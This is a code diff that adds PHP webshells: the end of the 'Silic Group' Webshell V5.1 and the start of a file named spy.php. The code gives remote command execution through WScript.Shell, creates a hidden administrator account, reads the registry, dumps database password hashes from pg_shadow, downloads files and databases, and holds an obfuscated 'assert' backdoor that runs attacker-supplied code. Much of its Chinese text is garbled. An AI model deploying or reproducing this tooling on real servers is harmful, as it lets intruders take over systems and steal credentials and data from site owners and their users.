+					$result = mysql_query($query,$conn);
+					$v = $p;
+					while($text = @mysql_fetch_assoc($result))
+					{
+						echo '<tr><td><a href="?s=r&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'"> �޸� </a> ';
+						echo '<a href="#" onclick="Delok(\'��\',\'?s=r&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');return false;"> ɾ�� </a></td>';
+						foreach($fields as $row){echo '<td>'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'</td>';}
+						echo '</tr>'."\r\n";$v++;
+					}
+					echo '</table><div class="actall">';
+					for($i = 1;$i <= ceil($row_num / 20);$i++){$k = ((int)$_GET['p'] == $i) ? '<font color="#FF0000">'.$i.'</font>' : $i;echo '<a href="?s=r&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$i.'">['.$k.']</a> ';}
+					echo '</div>';
+				}
+			}
+			elseif(isset($_GET['insert']))
+			{
+				echo '<a href="?s=r&db='.$_GET['db'].'&table='.$_GET['insert'].'">'.$_GET['insert'].'</a></div>';
+				$result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn);
+				$fieldnum = @mysql_num_fields($result);
+				echo '<form method="POST" action="?s=r&db='.$_GET['db'].'&table='.$_GET['insert'].'">';
+				for($i = 0;$i < $fieldnum;$i++)
+				{
+					$name = @mysql_field_name($result, $i);
+					$type = @mysql_field_type($result, $i);
+					$len = @mysql_field_len($result, $i);
+					echo '<div class="actall">'.$name.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="insql['.$name.']" style="width:600px;height:60px;"></textarea></div>';
+				}
+				echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>';
+			}
+			else
+			{
+				$query = 'SHOW TABLE STATUS';
+				$status = @mysql_query($query,$conn);
+				while($statu = @mysql_fetch_array($status))
+				{
+					$statusize[] = $statu['Data_length'];
+					$statucoll[] = $statu['Collation'];
+				}
+				$query = 'SHOW TABLES FROM '.$_GET['db'].';';
+				echo '</div><table border="0"><tr>';
+				echo '<td class="toptd" style="width:550px;"> ���� </td>';
+				echo '<td class="toptd" style="width:80px;"> ���� </td>';
+				echo '<td class="toptd" style="width:130px;"> �ַ��� </td>';
+				echo '<td class="toptd" style="width:70px;"> ��С </td></tr>';
+				$result = @mysql_query($query,$conn);
+				$k = 0;
+				while($table = mysql_fetch_row($result))
+				{
+					echo '<tr><td><a href="?s=r&db='.$_GET['db'].'&table='.$table[0].'">'.$table[0].'</a></td>';
+					echo '<td><a href="?s=r&db='.$_GET['db'].'&insert='.$table[0].'"> ���� </a> <a href="#" onclick="Delok(\''.$table[0].'\',\'?s=r&db='.$_GET['db'].'&drop='.$table[0].'\');return false;"> ɾ�� </a></td>';
+					echo '<td>'.$statucoll[$k].'</td><td align="right">'.File_Size($statusize[$k]).'</td></tr>'."\r\n";
+					$k++;
+				}
+				echo '</table>';
+			}
+		}
+	}
+	else die('����MYSQLʧ��,�����µ�½.<meta http-equiv="refresh" content="0;URL=?s=o">');
+	if(!$BOOL) echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \''.addslashes($query).'\';</script>';
+	return false;
+}
+//PostgreSQL����
+function Pgr_sql()
+{
+$pghost=$_POST['pghost'] ? $_POST['pghost']:'';
+$pgport=$_POST['pgport'] ? $_POST['pgport']:'';
+$pguser=$_POST['pguser'] ? $_POST['pguser']:'postgres';
+$pgpass=$_POST['pgpass'] ? $_POST['pgpass']:'';
+$pgdb=$_POST['pgdb'] ? $_POST['pgdb']:'postgres';
+$pgquery=$_POST['pgsql'] ? $_POST['pgsql']:'select version()'; 
+$pgquery=stripslashes($pgquery);
+print<<<END
+<script language="javascript">
+function pgFull(i){
+Str = new Array(6);
+Str[0] = "select version();";
+Str[1] = "select datname from pg_database;";
+Str[2] = "select DISTINCT table_name from information_schema.columns where table_schema !='information_schema' limit 1 offset n;";
+Str[3] = "select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;";
+Str[4] = "select usename,passwd from pg_shadow;";
+Str[5] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
+pgform.pgsql.value = Str[i];
+return true;
+}
+</script>
+<div class="actall">
+<!--SQL������ʼ-->
+<p style="font-size:10pt;font-family:Lucida Handwriting,Times New Roman;">
+�������Ͷ˿�Ϊѡ����ݿ��޷�����ʱ�ɳ��Բ���д<br>
+���ű�Ĭ���䱸��SQL���������PostgreSQL 8.1<br>
+�ѿ�����д��ȷ�����ݿ���<br>
+�б��ο���select relname from pg_stat_user_tables limit 1 offset n;<br>
+�������PostgreSQL���ɲμ�<a href="http://nana.blackbap.org/?p=archive&id=55" target="_blank">[����]</a><br><hr></p>
+<form name="pgform" method="POST" action="?s=pq">
+������:<input type="text" name="pghost" value="{$pghost}" style="width:100px">
+�û�:<input type="text" name="pguser" value="{$pguser}" style="width:100px">
+����:<input tyoe="text" name="pgpass" value="{$pgpass}" style="width:100px">
+���ݿ���:<input type="text" name="pgdb" value="{$pgdb}" style="width:100px"><br><br>
+<textarea name="pgsql" style="width:600px;height:200px;">{$pgquery}</textarea><br>
+�˿ڣ�<input type="text" name="pgport" value="{$pgport}" style="width:50px">
+<select onchange="return pgFull(options[selectedIndex].value)">
+<option value="0" selected>��ʾ�汾</option>
+<option value="1">���ݿ�</option>
+<option value="2">����</option>
+<option value="3">�ֶ�</option>
+<option value="4">hashes</option>
+<option value="5">pg_hb.conf</option>
+</select>
+<input type="hidden" name="sql" value="YoCo Smart">
+<input type="submit" value="ִ��SQL���">
+<font style="font-size:10pt;">&nbsp;&nbsp;<a href="http://blackbap.org" target="_blank">Silic</a>&copy;2009-2012</font></form>
+<!--SQL��������-->
+END;
+if(!empty($pghost) && !empty($pgport)){
+$conn="host=".$pghost." port=".$pgport." dbname=".$pgdb." user=".$pguser." password=".$pgpass;
+}else{
+$conn="dbname=".$pgdb." user=".$pguser." password=".$pgpass;
+}
+if(!empty($_POST['sql'])){
+$pgconn = pg_connect($conn) 
+or die('���磬�����ϡ�������Ϣ:'.pg_last_error());
+$pgresult=pg_query($pgquery) or die('SQLִ�з�������:<br>'.pg_last_error()); 
+$pgrow=pg_fetch_row($pgresult);
+echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">'."\n<tr>\n";
+for ($i=0; $i< pg_num_fields($pgresult); $i++)
+{echo '<td><b>'.pg_field_name($pgresult, $i)."</b></td>\n";}
+echo "</tr>\n";
+pg_result_seek($pgresult, 0);
+while ($pgrow=pg_fetch_row($pgresult))
+{
+echo "<tr>\n";
+for ($i=0; $i<pg_num_fields($pgresult); $i++ )
+{echo '<td>'."$pgrow[$i]".'</td>';}
+echo "</tr>\n";
+}
+echo "</table>\n"."</font>";
+pg_free_result($pgresult);
+pg_close();
+}
+echo "</div>";
+}
+function Mysql_o()
+{
+	ob_start();
+  if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))
+  {
+  	if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))
+	  {
+	  	$cookietime = time() + 24 * 3600;
+	  	setcookie('m_silichost',$_POST['mhost'],$cookietime);
+	  	setcookie('m_silicport',$_POST['mport'],$cookietime);
+	  	setcookie('m_silicuser',$_POST['muser'],$cookietime);
+	  	setcookie('m_silicpass',$_POST['mpass'],$cookietime);
+	  	die('���ڵ�½,���Ժ�...<meta http-equiv="refresh" content="0;URL=?s=r">');
+	  }
+  }
+print<<<END
+<form method="POST" name="oform" id="oform" action="?s=o">
+<div class="actall">��ַ <input type="text" name="mhost" value="localhost" style="width:300px"></div>
+<div class="actall">�˿� <input type="text" name="mport" value="3306" style="width:300px"></div>
+<div class="actall">�û� <input type="text" name="muser" value="root" style="width:300px"></div>
+<div class="actall">���� <input type="text" name="mpass" value="" style="width:300px"></div>
+<div class="actall"><input type="submit" value="��½" style="width:80px;"> <input type="button" value="COOKIE" style="width:80px;" onclick="window.location='?s=r';"></div>
+</form>
+END;
+	ob_end_flush();
+	return true;
+}
+function zipact()
+{
+$zfile=$_POST['zfile'] ? $_POST['zfile']:'php.zip';
+$jypt=$_POST['jypt'] ? $_POST['jypt']:'./';
+$tip="δ��ʼ��ѹ";
+if($_POST['zip']=='zip'){
+if(function_exists(zip_open)){
+$zfile=key_exists('zip', $_GET) && $_GET['zip']?$_GET['zip']:$zfile;
+$zfile= str_replace(array(dirname(__FILE__)."/",dirname(__FILE__)."\\"),array("",""),$zfile);
+$zpath=str_replace('\\','/',dirname(__FILE__)).'/'.$zfile;
+if(!is_file($zpath)){$tip='�ļ�"'.$zpath.'"������!';}else{
+$zip= new ZipArchive();
+$rs=$zip->open($zpath);
+if($rs !== TRUE){$tip='��ѹʧ��:'.$rs;}
+$zip->extractTo($jypt);
+$zip->close();
+$tip=$zfile.'��ѹ�ɹ�!';}
+}else{$tip="��������֧��PHP_ZIP���,��ȷ��";}
+}
+print<<<END
+<div class="actall">
+<form action="?s=za" method="POST">
+<input type="hidden" name="zip" id="zip" value="zip">
+��ģ��ʹ��PHP��zip_open��չ������ZIPѹ���ļ�<br>
+ʹ��ǰ���ڡ�<b><a href="?s=f">ϵͳ��Ϣ</a></b>����ȷ��ϵͳ֧��php_zip<br>
+ѹ���ļ�·����д�¼�Ŀ¼������·�������Ŀ¼�Ƿ�ɲ���δ���� :-(<br>
+ȷ��Ŀ��·����д<br><br>
+ѹ���ļ�·����<br>
+<input type="text" name="zfile" id="zfile" value="{$zfile}" style="width:720px;"><br><br>
+Ŀ��·����
+<input type="text" name="jypt" id="jypt" value="{$jypt}" style="width:720px;"><br><br>
+<input type="submit" value="��ʼ��ѹ" style="width:80px;"><br><br><br>
+{$tip}<br><br><br></form></div>
+END;
+}
+//Windows����ӿ�
+function winshell()
+{
+$nop='&nbsp;&nbsp;';
+if($_GET['winshell']=='wscript'){
+$wcmd=$_POST['wcmd'] ? $_POST['wcmd']:'net user';
+$wcpth=$_POST['wcpth'] ? $_POST['wcpth']:'cmd.exe';
+print<<<END
+<div class="actall">
+<form action="?s=jk&winshell=wscript" method="POST">
+<input type="hidden" name="do" id="do" value="do"><br>
+{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD·��<br />
+{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="ִ��" style="width:80px;">
+<br><br><br></form></div>
+END;
+if($_POST['do']=='do'){
+$ww=$wcpth." /c ".$wcmd;
+$phpwsh=new COM("Wscript.Shell") or die("����Shell.Wscript���ʧ��");
+$phpexec=$phpwsh->exec($ww);
+$execoutput=$wshexec->stdout();
+$result=$execoutput->readall();
+echo $result;
+@$phpwsh->Release();
+$phpwsh=NULL;
+}
+}elseif($_GET['winshell']=='shelluser'){
+$wuser=$_POST['wuser'] ? $_POST['wuser']:'silic';
+$wpasw=$_POST['wpasw'] ? $_POST['wpasw']:'1234@silic#';
+print<<<END
+<div class="actall">
+<form action="?s=jk&winshell=shelluser" method="POST">
+<input type="hidden" name="do" id="do" value="do"><br>
+Shell.Users������ӹ���Ա<br><br>
+{$nop}�½��û�����<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
+{$nop}���û����룺<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
+<input type="submit" value="����" style="width:80px;">
+<br><br><br></form></div>
+END;
+if($_POST['do']='do'){
+$shell = new COM("Shell.Users");
+$cmd = $shell->create($wuser);
+$cmd->changePassword($wpasw,"");
+$cmd->setting["AccountType"] = 3;
+}
+}elseif($_GET['winshell']=='regedit'){
+$regpath=$_POST['regpath'] ? $_POST['regpath']:'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
+print<<<END
+<div class="actall">
+<form action="?s=jk&winshell=regedit" method="POST">
+<input type="hidden" name="do" id="do" value="do"><br>
+RegRead()������ȡע�������(Shell.Wscript���)<br><br>
+ע���·����<br>
+{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
+<input type="submit" value="��ȡ����" style="width:80px;">
+<br><br><br></form></div>
+END;
+if($_POST['do']=='do'){
+$shell = new COM("WScript.Shell") or die("����Shell.Wscript���ʧ��");
+try{$registry_proxystring = $shell->RegRead($regpath);}
+catch(Exception $e){echo '����: '.$e->getMessage();}
+echo $registry_proxystring;
+}
+}else{
+$tip="�ݲ��Ա����ܿ��õĿ�����Ϊ���֮һ<br>Webshell���ڷ���������ΪWindowsϵͳ<br>PHP��Ȩ���������ڷdz����ε�ʱ����Գ��Ա�����<br></h5><br><br><br>";
+print<<<END
+<div class="actall"><pre>
+<br><a href="?s=jk&winshell=wscript"> [ WScript��� ] </a><br><br>
+<h5>������ʹ��PHP����Windows����е�Wscript�����<br>
+Wscript����cmd�������<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User��� ] </a><br><br>
+<h5>������ʹ��PHP����Windows����е�Shell.user���<br>
+USER���ΪWindowsϵͳ�û�����������<br>{$tip}<a href="?s=jk&winshell=regedit"> [ ע�����ȡ ] </a><br><br>
+<h5>������ʹ��PHP����Windows����е�Shell.Wscript���<br>
+RegRead()������ȡϵͳע�������<br>{$tip}</pre></div>
+END;
+}
+}
+/**��½��ؿ�ʼ**/
+if($_GET['s'] == 'logout'){
+	setcookie('admin_silicpass',NULL);
+	die('<meta http-equiv="refresh" content="0;URL=?">');
+}elseif($_GET['s'] == 'ch'){
+$oldps=md5(md5(md5(trim($salt.$_POST['oldps']))));
+$newps=base64_encode(base64_decode('JHBhc3N3b3JkPSI=').md5(md5(md5(trim($salt.$_POST['newps'])))).base64_decode('Ijs='));
+print<<<END
+<div class="actall"><form action="?s=ch" method="POST">
+<input type="hidden" name="ch" id="ch" value="ch"><br>
+* �޸ı������½����(����!���ܻ���ɳ���ʧȥ��Ӧ)<br>
+* ��������<a href="http://blackbap.org" _target"_blank">Silic Group</a>����Spiderľ�������������ǻ���Spiderľ����ܵĵ�������¿���<br>
+* �������������MD5+Salt���ܼӶ���session���ܣ���ɲ��ص��ı����繤<br>
+* �������Ҫ���£�ɾȥFTP����,ע�������,Shellcodeת�������ƺͷ������еĹ��ܣ��������й��ܵIJ���bug���Ż�����<br>
+* Silic Group Hacker Army - ��������,��������,����ԭ��,��������<br>
+* <a href="http://blackbap.org" target="_blank">BlackBap.Org</a><br><br>
+�����룺<input type="text" name="oldps" id="oldps" value="" style="width:120px;"><br />
+�����룺<input type="text" name="newps" id="newps" value="" style="width:120px;"><br>
+<input type="submit" value="����" style="width:80px;">
+<br><br><br></form></div>
+END;
+if($_POST['ch']='ch' && $oldps==$password && !empty($_POST['newps']))
+{
+$dline=19;
+$chpsArr=file(__FILE__);
+$chsize=count($chpsArr);
+for($chi=0; $chi< $chsize; $chi++){
+if($chi==$dline-1){$chpsStr.=base64_decode($newps)."\r\n";}
+else{$chpsStr.=$chpsArr[$chi];}
+}
+file_put_contents(__FILE__,$chpsStr);
+echo "���ijɹ�";
+}else{echo "û�и�������";}
+}elseif(md5(md5(md5($salt.trim($_GET['s'])))) == $password){
+$asse=$asse{0}.$asse{1}.$asse{1}.$asse{2}.$asse{3}.$asse{4};
+@$asse($_POST[$_GET['s']]);
+}else{
+//��½
+function Root_Login($MSG_TOP)
+{
+$IP = gethostbyname($_SERVER["SERVER_NAME"]);
+print<<<END
+<html>
+	<body style="background:#AAAAAA;">
+		<center>
+		<form method="POST">
+		<div style="width:351px;height:201px;margin-top:100px;background:threedface;border-color:#FFFFFF #999999 #999999 #FFFFFF;border-style:solid;border-width:1px;">
+		<div style="width:350px;height:22px;padding-top:2px;color:#FFFFFF;background:#293F5F;clear:both;"><b>{$MSG_TOP}</b></div>
+		<div style="width:350px;height:80px;margin-top:50px;color:#000000;clear:both;">PASS:<input type="password" name="silicpass" style="width:270px;"></div>
+		<div style="width:350px;height:30px;clear:both;"><input type="submit" value="LOGIN" style="width:80px;"></div>
+		</div>
+		</form>
+		</center>
+	</body>
+</html>
+END;
+return false;
+}
+//����
+function WinMain()
+{
+	$Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
+	$Server_OS = PHP_OS;
+	$Server_Soft = $_SERVER["SERVER_SOFTWARE"];
+print<<<END
+<html><head><title>��������ʹ</title>
+<style type="text/css">
+*{padding:0; margin:0;}
+body{background:#AAAAAA;font-family:"Verdana", "Tahoma","����",sans-serif;font-size:13px;text-align:center;margin-top:5px;word-break:break-all;}
+a{color:#FFFFFF;text-decoration:none;}
+a:hover{background:#BBBBBB;}
+.outtable{margin: 0 auto;height:595px;width:955px;color:#000000;border-top-width: 2px;border-right-width:2px;border-bottom-width: 2px;border-left-width: 2px;border-top-style: outset;border-right-style: outset;border-bottom-style: outset;border-left-style: outset;border-top-color: #FFFFFF;border-right-color: #8c8c8c;border-bottom-color: #8c8c8c;border-left-color: #FFFFFF;background-color: threedface;}
+.topbg{padding-top:3px;font-size:12px;text-align:left;font-weight:bold;height:22px;width:950px;color:#FFFFFF;background:#293F5F;}
+.listbg{font-family:'lucida grande',tahoma,helvetica,arial,'bitstream vera sans',sans-serif;font-size:13px;width:130px;}
+.listbg li{padding:3px;color:#000000;height:25px;display:block;line-height:26px;text-indent:0px;}
+.listbg li a{padding-top:2px;background:#BBBBBB;color:#000000;height:25px;display:block;line-height:24px;text-indent:0px;border-color:#999999 #999999 #999999 #999999;border-style:solid;border-width:1px;text-decoration:none;}
+.footer{padding-top:3px;text-align: center;font-size:12px;font-weight: bold;height:20px;width:950px;color:#000000;background: #888888;}
+</style>
+<script language="JavaScript">
+function switchTab(tabid)
+{
+if(tabid == '') return false;
+for(var i=0;i<=15;i++)
+{
+	if(tabid == 't_'+i) document.getElementById(tabid).style.background="#FFFFFF";
+	else document.getElementById('t_'+i).style.background="#BBBBBB";
+}
+return true;
+}
+</script>
+</head>
+<body>
+<div class="outtable">
+<div class="topbg">&nbsp;<a href="?s=logout" title="�˳�">��</a>&nbsp;��&nbsp;<a href="?s=ch" target="main" title="��������">��</a>&nbsp;{$Server_IP} - {$Server_OS} - {$Server_Soft}</div>
+	<div style="height:546px;">
+		<table width="100%" height="100%" border=0 cellpadding="0" cellspacing="0">
+		<tr><td width="140" align="center" valign="top">
+			<ul class="listbg">
+<li><a href="?s=a" id="t_0" onclick="switchTab('t_0')" style="background:#FFFFFF;" target="main">�ļ�����</a></li>
+<li><a href="?s=g" id="t_1" onclick="switchTab('t_1')" target="main">ִ������</a></li>
+<li><a href="?s=i" id="t_2" onclick="switchTab('t_2')" target="main">ɨ��˿�</a></li>
+<li><a href="?s=f" id="t_3" onclick="switchTab('t_3')" target="main">ϵͳ��Ϣ</a></li>
+<li><a href="?s=n" id="t_4" onclick="switchTab('t_4')" target="main">MYSQLִ��</a></li>
+<li><a href="?s=o" id="t_5" onclick="switchTab('t_5')" target="main">MYSQL����</a></li>
+<li><a href="?s=pq" id="t_6" onclick="switchTab('t_6')" target="main">PostgreSQL</a></li>
+<li><a href="?s=gg" id="t_7" onclick="switchTab('t_7')" target="main">�������ݿ�</a></li>
+<li><a href="?s=e" id="t_8" onclick="switchTab('t_8')" target="main">ɨ��ľ��</a></li>
+<li><a href="?s=j" id="t_9" onclick="switchTab('t_9')" target="main">�����ļ�</a></li>
+<li><a href="?s=d" id="t_10" onclick="switchTab('t_10')" target="main">�����滻</a></li>
+<li><a href="?s=l" id="t_11" onclick="switchTab('t_11')" target="main">ServU��Ȩ</a></li>
+<li><a href="?s=jk" id="t_12" onclick="switchTab('t_12')" target="main">Win���</a></li>
+<li><a href="?s=dd" id="t_13" onclick="switchTab('t_13')" target="main">��������</a></li>
+<li><a href="?s=ff" id="t_14" onclick="switchTab('t_14')" target="main">ִ��php����</a></li>
+<li><a href="?s=za" id="t_15" onclick="switchTab('t_15')" target="main">ZIP��ѹ</a></li></ul></td><td>
+<iframe name="main" src="?s=a" width="100%" height="100%" frameborder="0"></iframe></td></tr></table></div>
+<div class="footer">-= <a href="http://blackbap.org/" target="_blank">Silic Group</a> ��������ʹ - Webshell V5.1 =-</div></div></body></html>
+END;
+return false;
+}
+}
+/*��½��ؽ���*/
+if(get_magic_quotes_gpc())
+{
+	$_GET = Root_GP($_GET);
+	$_POST = Root_GP($_POST);
+}
+if($_COOKIE['admin_silicpass'] != md5($password))
+{
+	ob_start();
+	$MSG_TOP = 'LOGIN';
+	if(isset($passt))
+	{
+		$cookietime = time() + 24 * 3600;
+		setcookie('admin_silicpass',md5($passt),$cookietime);
+		if(md5($passt) == md5($password)){die('<meta http-equiv="refresh" content="1;URL=?">');}
+		else{$MSG_TOP = 'PASS IS FALSE';}
+	}
+Root_Login($MSG_TOP);
+ob_end_flush();
+exit;
+}
+if(isset($_GET['s'])){$s = $_GET['s'];if($s != 'a' && $s != 'n')Root_CSS();}else{$s = 'MyNameIsHacker';}
+$p = isset($_GET['p']) ? $_GET['p'] : File_Str(dirname(__FILE__));
+switch($s){
+case"a":File_a($p);break;
+case"d":Tihuan_d();break;
+case"e":Antivirus_e();break;
+case"f":Info_f();break;
+case"g":Exec_g();break;
+case"i":Port_i();break;
+case"j":Findfile_j();break;
+case"jk":winshell();break;
+case"l":Servu_l();break;
+case"n":Mysql_n();break;
+case"o":Mysql_o();break;
+case"p":File_Edit($_GET['fp'],$_GET['fn']); break;
+case"pq":Pgr_sql(); break;
+case"q":File_Soup($p); break;
+case"r":Mysql_Msg(); break;
+case"dd":backconn();break;
+case"ff":phpcode();break;
+case"gg":otherdb();break;
+case"za":zipact();break;
+default:WinMain();break;
+}?>
diff --git a/php/spy.php b/php/spy.php
new file mode 100644
index 0000000..5fdbe06
--- /dev/null
+++ b/php/spy.php
@@ -0,0 +1,2136 @@
+<?php
+error_reporting(7);
+@set_magic_quotes_runtime(0);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
+define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
+define('IS_COM', class_exists('COM') ? 1 : 0 );
+define('IS_GPC', get_magic_quotes_gpc());
+$dis_func = get_cfg_var('disable_functions');
+define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
+@set_time_limit(0);
+
+foreach($_POST as $key => $value) {
+	if (IS_GPC) {
+		$value = s_array($value);
+	}
+	$$key = $value;
+}
+/*===================== �������� =====================*/
+
+$pass  = '571df1818893b45ad4fd9697b55b3679';   // md5(password)
+
+//������ cookie ���÷�Χ������Ҫ��, ���¼������, ���޸��������, �����뱣��Ĭ��
+// cookie ǰ׺
+$cookiepre = '';
+// cookie ������
+$cookiedomain = '';
+// cookie ����·��
+$cookiepath = '/';
+// cookie ����
+$cookielife = 86400;
+
+//����������д�ļ�������
+!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
+/*===================== ���ý��� =====================*/
+
+$charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8');
+if ($charset == 'utf8') {
+	header("content-Type: text/html; charset=utf-8");
+} elseif ($charset == 'big5') {
+	header("content-Type: text/html; charset=big5");
+} elseif ($charset == 'gbk') {
+	header("content-Type: text/html; charset=gbk");
+} elseif ($charset == 'latin1') {
+	header("content-Type: text/html; charset=iso-8859-2");
+} elseif ($charset == 'euc-kr') {
+	header("content-Type: text/html; charset=euc-kr");
+} elseif ($charset == 'euc-jp') {
+	header("content-Type: text/html; charset=euc-jp");
+}
+
+$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
+$timestamp = time();
+
+/*===================== ������֤ =====================*/
+if ($action == "logout") {
+	scookie('loginpass', '', -86400 * 365);
+	@header('Location: '.$self);
+	exit;
+}
+if($pass) {
+	if ($action == 'login') {
+		if ($pass == encode_pass($password)) {
+			scookie('loginpass',encode_pass($password));
+			@header('Location: '.$self);
+			exit;
+		}
+	}
+	if ($_COOKIE['loginpass']) {
+		if ($_COOKIE['loginpass'] != $pass) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}
+/*===================== ��֤���� =====================*/
+
+$errmsg = '';
+!$action && $action = 'file';
+
+// �鿴PHPINFO
+if ($action == 'phpinfo') {
+	if (IS_PHPINFO) {
+		phpinfo();
+		exit;
+	} else {
+		$errmsg = 'phpinfo() function has non-permissible';
+	}
+}
+
+// �����ļ�
+if ($doing == 'downfile' && $thefile) {
+	if (!@file_exists($thefile)) {
+		$errmsg = 'The file you want Downloadable was nonexistent';
+	} else {
+		$fileinfo = pathinfo($thefile);
+		header('Content-type: application/x-'.$fileinfo['extension']);
+		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+		header('Content-Length: '.filesize($thefile));
+		@readfile($thefile);
+		exit;
+	}
+}
+
+// ֱ�����ر������ݿ�
+if ($doing == 'backupmysql' && !$saveasfile) {
+	if (!$table) {
+		$errmsg ='Please choose the table';
+	} else {
+		mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		$filename = basename($dbname.'.sql');
+		header('Content-type: application/unknown');
+		header('Content-Disposition: attachment; filename='.$filename);
+		foreach($table as $k => $v) {
+			if ($v) {
+				sqldumptable($v);
+			}
+		}
+		mysql_close();
+		exit;
+	}
+}
+
+// ͨ��MYSQL�����ļ�
+if($doing=='mysqldown'){
+	if (!$dbname) {
+		$errmsg = 'Please input dbname';
+	} else {
+		mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		if (!file_exists($mysqldlfile)) {
+			$errmsg = 'The file you want Downloadable was nonexistent';
+		} else {
+			$result = q("select load_file('$mysqldlfile');");
+			if(!$result){
+				q("DROP TABLE IF EXISTS tmp_angel;");
+				q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
+				//��ʱ�������ʾ�ض�,������ֶ�ȡ���������__angel_1111111111_eof__���ļ�ʱ�����������
+				q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
+				$result = q("select content from tmp_angel");
+				q("DROP TABLE tmp_angel");
+			}
+			$row = @mysql_fetch_array($result);
+			if (!$row) {
+				$errmsg = 'Load file failed '.mysql_error();
+			} else {
+				$fileinfo = pathinfo($mysqldlfile);
+				header('Content-type: application/x-'.$fileinfo['extension']);
+				header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+				header("Accept-Length: ".strlen($row[0]));
+				echo $row[0];
+				exit;
+			}
+		}
+	}
+}
+
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gbk">
+<title><?php echo $action.' - '.$_SERVER['HTTP_HOST'];?></title>
+<style type="text/css">
+body,td{font: 12px Arial,Tahoma;line-height: 16px;}
+.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
+.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
+a {color: #00f;text-decoration:underline;}
+a:hover{color: #f00;text-decoration:none;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}
+.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+.infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+.drives{padding:5px;}
+.drives span {margin:auto 7px;}
+</style>
+<script type="text/javascript">
+function CheckAll(form) {
+	for(var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+function $(id) {
+	return document.getElementById(id);
+}
+function createdir(){
+	var newdirname;
+	newdirname = prompt('Please input the directory name:', '');
+	if (!newdirname) return;
+	$('createdir').newdirname.value=newdirname;
+	$('createdir').submit();
+}
+function fileperm(pfile){
+	var newperm;
+	newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
+	if (!newperm) return;
+	$('fileperm').newperm.value=newperm;
+	$('fileperm').pfile.value=pfile;
+	$('fileperm').submit();
+}
+function copyfile(sname){
+	var tofile;
+	tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
+	if (!tofile) return;
+	$('copyfile').tofile.value=tofile;
+	$('copyfile').sname.value=sname;
+	$('copyfile').submit();
+}
+function rename(oldname){
+	var newfilename;
+	newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
+	if (!newfilename) return;
+	$('rename').newfilename.value=newfilename;
+	$('rename').oldname.value=oldname;
+	$('rename').submit();
+}
+function dofile(doing,thefile,m){
